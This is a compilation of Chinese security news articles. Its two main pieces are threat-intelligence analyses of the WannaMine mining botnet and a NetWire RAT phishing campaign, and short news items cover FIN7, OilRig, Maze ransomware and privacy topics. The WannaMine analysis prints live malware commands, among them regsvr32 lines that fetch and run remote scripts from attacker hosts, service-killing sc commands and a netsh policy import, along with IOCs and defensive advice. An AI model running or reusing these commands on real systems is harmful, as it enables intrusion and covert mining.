感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新，WannaMine最早于2017年底被发现，主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性，会采用多种手法清理、阻止竞争木马的挖矿行为，同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点： 利用“永恒之蓝”漏洞攻击传播； 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动； 通过添加IP策略阻止本机连接对手木马的47个矿池，阻止其他病毒通过“永恒之蓝”漏洞入侵； 添加计划任务，WMI事件消费者进行持久化攻击，删除“MyKings”病毒的WMI后门； 利用COM组件注册程序regsvr32执行恶意脚本； 利用WMIClass存取恶意代码； 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化，计划任务名：’Microsoft\Windows\MUI\LMRemove’， ‘Microsoft\Windows\Multimedia\SystemEventService’，执行以下命令： regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序，用于在Windows系统上注册和注销对象链接和嵌入控件，包括动态链接库（DLL），Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理，因此可以通过在调用期间将统一资源定位符（URL）作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时，恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述，其中被嵌入了一段JScript脚本，功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下： 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本，也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ，$fffffff，$ssssssss来分别保存加密数据，然后继续执行，后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头，这段字符在Powershell的混淆代码中较为常见，功能等同于Powershell命令中的“IEX”（Invoke-Expression），IEX用于将字符串作为命令执行，当去掉IEX后，执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”，即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码，包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门，以及属于未知团伙的“BotFilter82“，“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者，其中事件过滤器名$filterName = (‘Windows Events Filter’)，事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”，达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化： 旧版： 备用服务器地址：profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址：172.247.116.8 默认端口：8000 核心Powershell：in6.ps1,in3.ps1 新版： 备用服务器地址：safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址：skt.xiaojiji.nl 默认端口：80 核心Powershell：network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象，将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手，杀死进程命令行包含字符“System_Anti_Virus_Core “，”cryptonight “的进程，同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码，攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址，取A段和B段作为IP地址开头，然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口，在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码，得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击，利用WMI的远程命令执行功能，调用Invoke-WmiMethod执行远程Powershell命令（64位执行 http[:]//safe.dashabi.nl/networks.ps1，32位执行http[:]//safe.dashabi.nl/netstat.ps1）。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描，将存在漏洞的IP保存至$i17中，然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc，该命令内容由之前的三个变量之一$ssssssss中解密得到，主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象，如果是则执行远程恶意代码：http[:]//207.246.124.125/networks.ps1 RunDDOS（Gh0st远控木马） Networks.ps1中解码出$fffffff后，调用其函数RunDDOS ，指定参数”cohernece.exe”，从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据，并还原成PE文件cohernece.exe到%Temp%目录下，通过start-process命令执行。 分析发现，该文件当前并非DDOS木马，而是Gh0st远控木马，当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见，技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后，调用其函数RunXMR，指定参数”steam.exe”，从http[:]//safe.dashabi.nl/steam.txt下载二进制数据，并还原成PE文件steam.exe到%Temp%目录下，通过start-process命令执行。steam.exe为自解压程序，解压目录为c:\windows\fonts\Wbems\，解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务： sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性： attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe，该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec，将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器，阻止本机向其他47个矿池IP地址发起的TCP网络连接，从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信，包括局域网和远程连接，从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性，并在该注册表下写入StartExe值，利用微软”The Ease of Access Center”（便捷访问中心）特性来启动木马uas.exe。 然后通过服务管理程序msdtc，将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下： DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译，支持CPU和NVIDIA CUDA显卡GPU挖矿（4.5.0以后）。 使用以下矿池： xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包： 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点，我们建议企业采取以下措施加以防范： 使用安全的密码策略，切勿使用弱口令； 及时修复Windows系统漏洞，推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞，亦可参考以下链接重点修复永恒之蓝相关漏洞；（1）MS17-010永恒之蓝漏洞补丁下载地址：（2）XP、WindowsServer2003、win8等系统访问：http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598（3）Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口，如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的指定IP连接登陆； 对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器； 当系统出现异常时，检查计划任务和WMI（可用WMITools.exe）中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接： WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃，14万台linux系统受攻击

专家们发现了一种被FIN7网络犯罪集团称为BIOLOAD的新型加载程序，该程序被用在Carbanak 后门作为新变化的释放器。 Fortinet EnSilo的研究人员发现，被称为BIOLOAD的新型的装载程序与FIN7黑客组织有关联。 Fin7黑客组织自2015年末开始活跃，活动目标是窃取全球范围内的企业支付卡信息，目前疑似已经袭击了100多家美国公司，袭击领域主要集中在其在餐饮、酒店和工业等行业。2018年8月，臭名昭著的FIN7网络犯罪集团三名犯罪人员被起诉，并受到网络欺诈、黑客入侵、盗取身份密码等行为的指控。 此外，BIOLOAD加载程序与BOOSTWRITE加载程序还存在极大的关联。 从相似角度看，BOOSTWRITE也是一个与FIN7组织相关联的加载程序，它也能够将恶意软件直接放入内存，但BIOLOAD通过二进制植入技术，采用dll的劫持方法，将恶意代码加载到合法程序中。 在研究过程中，Fortinet EnSilo的研究人员在FaceFodUninstaller.exe二进制文件中发现了一个恶意的动态链接库，这个链接库从windows 10 1803中开始清理安装Windows OS.此外，研究人员还发现黑客们在DLL“Winbio”所在的“\ System32 \ WinBioPlugIns”文件夹中被植入了恶意的WinBio.dll。 从不同角度看，BIOLOAD装载机样本于分别2019年3月和7月进行了编制，而BOOSTWRITE样本于5月编制。在加载器上，BIOLOAD不支持多个有效载荷，而使用XOR来解密有效载荷，并不是ChaCha密码。在秘钥连接上，BIOLOAD从受害者的名字中获得解密密钥而不是连接远程服务器来获取解密密钥。 2019年1月至4月的时间戳显示，BIOLOAD加载器主要被用来进行程序攻击，并进行Carbank病毒传输。专家发现，这些新的Carbank 病毒样本在对受感染的机器运行上针对防病毒解决方案检查相比以往会更多。而根据针对恶意软件攻击观察的TTPs分析表明：BIOLOAD是由FIN7网络犯罪集团开发的，很可能是BOOSTWRITE的前身。 Fortinet因此得出结论：“这是第一起FaceFodUninstaller.exe被威胁行为者滥用的主体案件，Fin7拥有最新工具的共享代码库，以及同样的技术和后门，导致了因加载程序而引发网络犯罪。时间戳以及更简单的功能表明BIOLOAD是在BOOSTWRITE基础上的更新。” Fortinet建议：由于加载程序是专门为每台目标计算机构建的，需要管理权限才能部署，因此建议相关部门要注意收集有关目标网络的信息。   消息来源：securityaffairs， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文

臭名昭著的OilRig伊朗威胁组织通过使用各种PowerShell脚本将恶意软件伪装成合法的Cisco AnyConnect应用程序，以安装Poison Frog后门程序。 Poison Frog是OilRig集团武器库中最强大的后门之一，它包含一个面板，面板上有服务器端部件和PowerShell中曾用于各种备受关注网络攻击的Payload。 卡巴斯基研究人员还发现了一个新样本，它是一个用C语言编写的PE可执行文件，只有删除包含后门Powershell脚本的功能。在同样的逻辑下，还发现了另一个PowerShell脚本，它有两个不同的长字符串，包含DNS和HTTP后门也就是Poison Frog后门。 为了安装恶意软件，OilRig威胁组织成员还巧妙使用了计俩，将恶意软件伪装成合法的Cisco AnyConnect应用程序。 卡巴斯基研究人员发表报告称“信息弹出窗口会在每次点击时出现，起到欺瞒用户的作用，使用户误认为是应用程序或互联网的接入有问题，而实际上却是在悄悄的将后门安装在系统上。”   消息来源：gbhackers， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文  

12月26日消息，据外媒报道，通过使用短程手机传感器和覆盖整个校园的WiFi网络，美国各地大学能够比以往任何时候都更精确地跟踪数十万名学生位置。如今，数十所美国大学正使用这种技术来监控学生的学习表现，分析他们的行为或评估他们的心理健康情况。 以雪城大学为例，当新生走进杰夫·鲁宾教授（Jeff Rubin）的信息技术导论课时，格兰特礼堂报告厅周围隐藏的七个蓝牙信标会与他们智能手机上的一款应用程序SpotterEDU相连，以此督促他们出勤。SpotterEDU还会记录学生逃课情况，将他们的缺席记录传到校园数据库中，这可能会降低他们的成绩。这款应用还能提醒鲁宾教授联系学生，询问他们去了哪里。 鲁宾表示：“我的课程很少有人缺席。学生们想要获得学分，他们知道我在关注他们，并会对此采取行动。所以，他们会主动改变自己的行为。” 对于校园跟踪系统是否侵犯隐私，学生们意见不一，有些人认为他们没有什么可隐瞒的。但有的学生抱怨称：“我们都是成年人了，真的需要被继续追踪吗？这有什么必要呢？对我们有什么好处？这种情况会持续下去，直到我们每分每秒都得到微观管理吗？“ 不论是否支持校园跟踪系统，几乎所有人都有这样的感觉：这项技术正在变得无处不在，而被监控的人实际上对此无能为力。 许多教育倡导者认为，这些监控系统代表了新的侵入性技术，大规模侵犯了学生的隐私。他们担心，这种追踪系统会让学生在他们长大成人的地方显得幼稚，导致他们把监控视为生活的正常部分，不管他们喜欢与否。此外，这也会破坏学生的独立性，阻止他们培养业余兴趣爱好，因为他们担心自己时刻受到监视。     （稿源：网易科技，封面源自网络。）

Maze勒索软件近期发布2GB的文件，有消息称这些文件正是从彭萨科拉市所盗取。 本月彭萨科拉市遭到勒索软件攻击，该市的通信系统受到影响，网络系统几近瘫痪。据Bleeping Computer证实，这一事件的发生正是因为受到Maze勒索软件的攻击。昨天，Maze勒索软件也发布了32GB文件中的2GB文件，他们声称这些文件来源于在加密网络前就已盗取该市的网络数据，若想解密数据，需花费赎金100万美元。 在Bleeping Computer与Maze相关黑客人员的商讨中，Maze方透露，他们所盗取的文件远不止发布的2GB. “这是媒体报道的错误，我们所盗取的数据远不止如此，我们也不想给这座城市造成压力，也早已表明了真实的意图，但现在还没到我们想到的预期。” 当Bleeping Computer询问他们是否打算发布其余的数据时，他们的回答是“这取决于彭萨科拉市政府”。   消息来源：bleepingcomputer， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文

12月21日消息，据《财富》网站报道，到2020年，许多美国人将得到一个强大工具来保护他们的在线隐私。美国加州出台了一项新法律，将要求企业告诉消费者它们收集了消费者哪些数据，而且消费者可要求删除这些数据。 这部被称为《加州消费者隐私法》(CCPA)的法律可能会对网络经济造成严重破坏，因为很多公司——从科技巨头到普通零售商——都依赖定向推送广告。如果人们要求公司删除他们的数据，这些广告的效果就会下滑。 例如，由于在线广告不再像以前那样个性化，沃尔玛可能会错过一些销售机会。与此同时，谷歌面临着失去一大部分收入的风险，因为普通广告的价格远远低于利用个人数据的定向推送广告。 加州这部法律正在被美国其它24个州效仿，其影响可能是巨大的。但只有在明年1月1日新法律生效后，人们才会行使自己的新权利。而且考虑到虽然欧洲2018年就实施了被称为《通用数据保护条例》（GDPR）类似法律，但利用该法律维权的人数并不很多，因此加州这部法律究竟会带来怎样影响，目前很大程度上只是个猜测。 德勤咨询公司(Deloitte)企业风险专家克里斯·梅(Chris May)表示：“这对数千、数十万还是数百万的人来说是件大事？我们还不知道。” 然而，对于受到这部隐私保护法律影响的企业来说，遵守规则的负担是非常现实的。例如，这部法律要求，企业要求消费者提供数据或消费者要求删除自己的数据，企业要给消费者提供两种方式，如在线表格和免费电话号码。加州司法部长委托撰写的一份无党派报告称，加州的企业将不得不额外支出550亿美元的前期成本，包括法律咨询和更改系统等，就单个企业而言，其额外支出将从5.5万至200万美元。 虽然《加州消费者隐私法》是加州的地方法律，但美国大多数大公司都在加州做生意，因此都会受到影响。很少有企业能承担退出这个美国最大市场的代价。 为了树立更好的名声，一些大公司，如微软，以及一些小公司，包括波士顿的互联网服务提供商Starry，已经表示他们将自愿在美国所有的50个州遵守这部法律。Starry首席执行官查特·卡诺加(Chet Kanojia)称，到目前为止，只有少数客户要求删除他们的数据，还有几十人写信给公司，感谢给了他们这样做的选择。 其他人，如美国商会(U.S. Chamber of Commerce)副会长蒂姆·戴恩(Tim Day)则对这部法律不那么乐观。他警告称，这部法律将使成千上万的小型企业陷入困境，比如花店和小型酿酒厂。 加州的这部法律豁免了大多数销售额低于2500万美元的公司。但是，那些拥有至少5万用户数据的公司——例如，收集客户电子邮件地址的公司很容易达到这个门槛——必须遵守新的规则。 戴恩表示：“大企业有能力解决这个问题，但对于小企业来说，这是一个极端沉重的负担，而小企业是美国经济的支柱。” 因此，克里斯·梅预测，美国许多中小企业可能不会遵守这部法律，因为他们认为自己不会受到惩罚，或者受到的任何惩罚会比遵守这部法律的成本更低。这部法律规定了6个月的宽限期，加州司法部将于7月1日开始执行这项法律。克里斯·梅表示，小型花店和酿酒厂不太可能成为这部法律的主要目标。 加州司法部长泽维尔·贝塞拉(Xavier Becerra)在一封电子邮件中表示：“我们被赋予了执行这部法律的责任，所以我们要做的就是尽我们所能与消费者和企业合作，确保他们遵守这部法律。” 然而，这可能不是最后的结论，因为美国商会正在游说美国国会通过一部联邦法律来取代加州的这部法律。美国科技行业早些时候的一次尝试失败了，但戴恩表示，美国商会的这次推动不同于以往，因为该组织希望保留加州法律的广泛原则，尤其是要求和删除大部分个人数据的权利，同时更多地保护中小企业。 在美国国会，民主党和共和党罕见地就通过这样一部法律达成了一致，尽管两党对哪个部门应该执行这项法律，以及联邦法律是否应该优先于州级隐私法存在分歧。许多人认为在2020年总统大选之前不太可能出台新的立法，但美国智库布鲁金斯学会(Brookings Institution)的隐私专家卡梅伦?克里(Cameron Kerry)认为，美国对隐私的态度已经发生了巨大变化，可能会在2020年总统大选之前通过一项法律。 克里说：“随着越来越多的国会议员将更多时间花在网络上，并担心数据隐私对他们的后代带来影响，情况已发生变化。”   （稿源：网易科技，封面源自网络。）

今天早些时候，推特（Twitter）面向所有Android端推特用户发送了一封电子邮件，在确认公司已经修复Android端APP存在的严重漏洞之外，有黑客可能通过该漏洞获取了部分用户账户信息。在公司发布的详细博文中，推特表示公司目前并没有发现任何直接证据表明这些数据已经被使用，在暗网或者其他渠道上也没有披露/出售的信息。 但是作为预防措施，推特已经通过电子邮件和移动APP的方式通知用户尽快更改密码，从而确保自己的账户安全。此外该公司还向用户发布了相关说明和APP更新。 在电子邮件中写道： 我们最近修复了存在于Android端Twitter应用中的一个漏洞，该漏洞能够让不良行为者看到非公开帐户信息或控制您的帐户（即发送推文或直接消息）。在修复之前，通过将恶意代码插入Twitter应用程序受限制的存储区域等复杂过程，不良行为者可能已经可以访问来自Twitter应用程序的信息（例如，直接消息，受保护的推文，位置信息）。 我们没有证据表明恶意代码已插入到应用程序中或已利用此漏洞，但是目前我们无法百分百确认，因此我们需要格外的小心。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/l9FMQq6i1nNopeVrF7X9Sw   一、背景 腾讯安全御见威胁情报中心检测到利用钓鱼邮件传播NetWire RAT变种木马的攻击活跃。攻击者将“订单询价”为主题的邮件发送至受害者邮箱，在附件中提供精心构造的利用Office漏洞（CVE-2017-8570）攻击的文档，存在漏洞的电脑上打开文档，会立刻触发漏洞下载NetWire RAT木马，中毒电脑即被远程控制，最终导致商业机密被盗。 NetWire是一种活跃多年的，公开的远程访问木马（RAT），该木马至少从2012年开始就被犯罪分子和APT组织使用。此次攻击中使用的NetWire变种采用MS Visual Basic编译，并且通过添加大量无关指令隐藏恶意代码。为了对抗分析，NetWire还会以调试模式启动自身为子进程并提取恶意代码注入。 NetWire RAT木马安装到受害系统后，会添加自身到系统启动项，搜集系统信息上传至服务器，然后接受控制端指令完成下载执行、搜集系统信息、搜集登录密码、记录键盘输入以及模拟鼠标键盘操作等行为。攻击者利用的Office漏洞（CVE-2017-8570）影响Office 2007至2016之间的多个版本。 NetWire攻击流程 二、详细分析 以咨询商品报价订单为主题的钓鱼邮件。 邮件附件是一个RTF文档RFQ# 19341005D.doc(默认用Word关联打开)，其内容被写入了人物“John Smith”的维基百科查询返回结果。而该文档实际上包含黑客精心构造的CVE-2017-8570漏洞利用代码，该漏洞影响Office2007-Office2016之间的多个版本。存在漏洞的系统上使用Office程序打开攻击文档会触发漏洞攻击，微软已在2017年7月发布该漏洞的安全更新。 打开RTF文档后，会自动释放文档中被插入的Package对象到%temp%目录，Package对象实际上是一个恶意Scriptletfile（.sct）脚本文件。 CVE-2017-8570漏洞触发成功后会直接加载文档释放到%temp%目录下的trbatehtqevyaw.ScT脚本执行，Scriptletfile启动Powershell命令下载 http[:]//www.komstrup.com/pure/zomstag.png或http[:]//www.komstrup.com/pure/zomdost.png，保存为%Temp%\zomstag.exe或%Temp%\zomdost.exe。 zomstag.exe(zomdost.exe)是公开的远程控制木马NetWire的变种，该木马至少从2012年开始就被犯罪分子和APT组织使用，是一款商业木马。 该NetWire变种是使用MS Visual Basic编译的，并且使用了多种反分析技术来对抗分析。 添加大量无关指令隐藏恶意代码。 动态地将恶意代码提取到内存中，然后跳转到目标位置执行。 NetWire添加自身到注册表的自动运行组 <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows之中，使得当受感染的系统启动时可以自动运行。 并且创建注册表<HKCU>\SOFTWARE\NetWire、<HKCU>\SOFTWARE\NetWire\HostId、 <HKCU>\SOFTWARE\NetWire\Install Date，在其中记录受害机器ID和木马安装时间。 NetWire将自己重新启动为子进程时，使用指定的DEBUG_ONLY_THIS_PROCESS标志进行重新启动，这使得父进程充当子进程的调试器，导致其他调试器无法附加到子进程，从而阻止分析员分析恶意代码细节。然后修改子进程其内存和线程的上下文数据，在线程上下文中修改OEP值，提取NetWire的真实恶意代码并覆盖子进程中的现有代码，接着在子进程中执行该代码。 NetWire创建了一个日志文件夹，用于存储从受害者系统收集的信息的日志文件，日志文件夹位于”%AppData%\Updater”。它将记录受害者的所有键盘操作、时间以及受害者所键入内容，记录的数据被编码后保存到日志文件中。 NetWire与C&C地址45.89.175.161:3501通信，搜集计算机基本信息，包括当前登录的用户名，计算机名称，Windows版本信息，当前活动的应用程序标题，计算机的当前时间，计算机的IP地址等信息发送至控制服务器，然后等待服务器返回的指令，进行以下操作： 1、获取受害者持续处于非活动状态的时间。 2、执行下载的可执行文件，或执行现有的本地文件。 3、执行以下操作：退出NetWire进程，关闭C&C服务器的套接字，从系统注册表中的Home键读取值，重置或删除指定的注册表键，删除NetWire可执行文件并重新定位其可执行文件。 4、收集受害者系统的分区和硬盘驱动器信息，获取指定文件夹中的文件信息，通过指定的文件类型获取文件信息，创建指定的目录和文件，将内容写入指定的文件，删除、重定位特定文件，以及其他与文件相关的操作。 5、窃取并收集通过不同软件存储在受害者系统中的凭证。 重点针对以下软件：360Chrome、Opera、Mozilla Firefox、Mozilla SeaMonkey、Google Chrome、Comodo Dragon浏览器、YandexBrowser、Brave-Browser、Mozilla Thunderbird、Microsoft Outlook和Pidgin。 除此之外，还会从历史记录文件夹中读取受害者的浏览器历史记录。 6、操作该文件夹中的日志文件（%AppData%\Updater）包括枚举日志文件、获取指定的日志文件属性、读取和删除指定的日志文件。 7、获取在受害者设备上创建的窗口句柄。 8、收集受害者的计算机基本信息。 9、控制受害者的输入设备，可模拟键盘和鼠标操作。 NetWire RAT控制端界面 三、安全建议 1、及时修复Office漏洞CVE-2017-8570，参考微软官方公告： https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570 2、建议不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描； 3、建议升级Office系列软件到最新版本，对陌生文件中的宏代码坚决不启用；版本过低的Office、Adobe Acrobat、Flash等组件的漏洞一直是黑灰产业重点攻击目标。 4、推荐企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击，个人用户启用腾讯电脑管家的安全防护功能； 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.89.175.161 MD5 13613f57db038c20907417c1d4b32d41 750de24fff5cead08836fe36ba921351 ca1e938142b91ca2e8127f0d07958913 fe24be93ce873d53338ccaa870a18684 URL http[:]//www.komstrup.com/pure/zomdost.png http[:]//www.komstrup.com/pure/zomstag.png http[:]//www.komstrup.com/pure/zomebu.png 参考链接： https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing.html

据外媒报道，当地时间周五，美国新奥尔良市官员试图遏制针对其网络的网络攻击。据悉，该攻击导致电脑离线、办公室关闭、市政府网站关闭。不过该市目前还没有发现任何密码被破解或数据在攻击中丢失的迹象，但大量涌入的电子邮件意味着该市的系统暂时关闭。 到下午晚些时候，该市还没有发现任何密码被破解或数据在攻击中丢失的迹象，不过大量涌入的可疑电子邮件意味着该市的系统将要暂时处于离线状态。 目前还不清楚该城市系统将要离线多长时间。路易斯安那州警方、国民警卫队、FBI 和特勤局的专家都加入了调查工作中。与此同时，官员们表示，重要的公共安全服务仍会继续运行，市政厅办公室将依靠纸笔继续开展业务。 对于此次攻击的确切性质和范围还不清楚，但似乎是在当地时间12月14日上午5点左右开始。当时，市政府官员首次注意到他们的网络上存在可疑活动。8点左右，员工上班时接到可疑活动的报告。随后，官员们决定上午11点以后关闭政府系统。   （稿源：cnBeta，封面源自网络。）

据外媒报道，有人黑进了美国密西西比一户人家的环形安全摄像头，并且还用扬声器骚扰这家的8岁女孩。这名黑客告诉她自己是圣诞老人并还怂恿她破坏房间。这是近期发生的几起黑客在用户不知情的情况下登陆其Ring账号的攻击事件之一。 Ashley LeMay近日告诉媒体，她在自己女儿房间里安装了摄像头，这样她就可以在上夜班时照看她们。“在我买到它们之前做了很多研究。你知道，我真的觉得它是安全的。” 然而这次入侵就发生在她安装这款摄像头四天后，当时她正在出差，她的丈夫在家带孩子。 当她的女儿Alyssa听到自己卧室传出来声音后于是走进去看看究竟是什么。 从当事人分享的视频可以看到，Alyssa非常紧张地站在自己的房间里，黑客则远程播放了来自恐怖片《潜伏》里的歌曲《Tiptoe through the Tulips》。 “谁在那里，”Alyssa问道。 “我是你最好的朋友。我是圣诞老人。我是圣诞老人。难道你不想成为我最好的朋友吗？”黑客说道。 之后，这个匿名黑客继续骚扰Alyssa、嘲笑她并怂恿她破坏房间。 对此，这款摄像头厂商Ring在提供给媒体的声明中指出，黑客并不是通过数据泄露或破坏Ring的安全获取信息的，相反，这个人可能利用了这户人家账户的安全性。 根据声明，Ring用户经常会使用相同的用户名和密码来注册不同账户和订阅服务。“作为预防措施，我们强烈并公开鼓励所有Ring用户在其Ring账户上启用双重认证、添加共享用户（而不是共享登录凭证）、使用高安全性密码并定期更换密码。” Ashley表示，她还没有在她的设备上设置双重认证。   （稿源:cnBeta，封面源自网络。）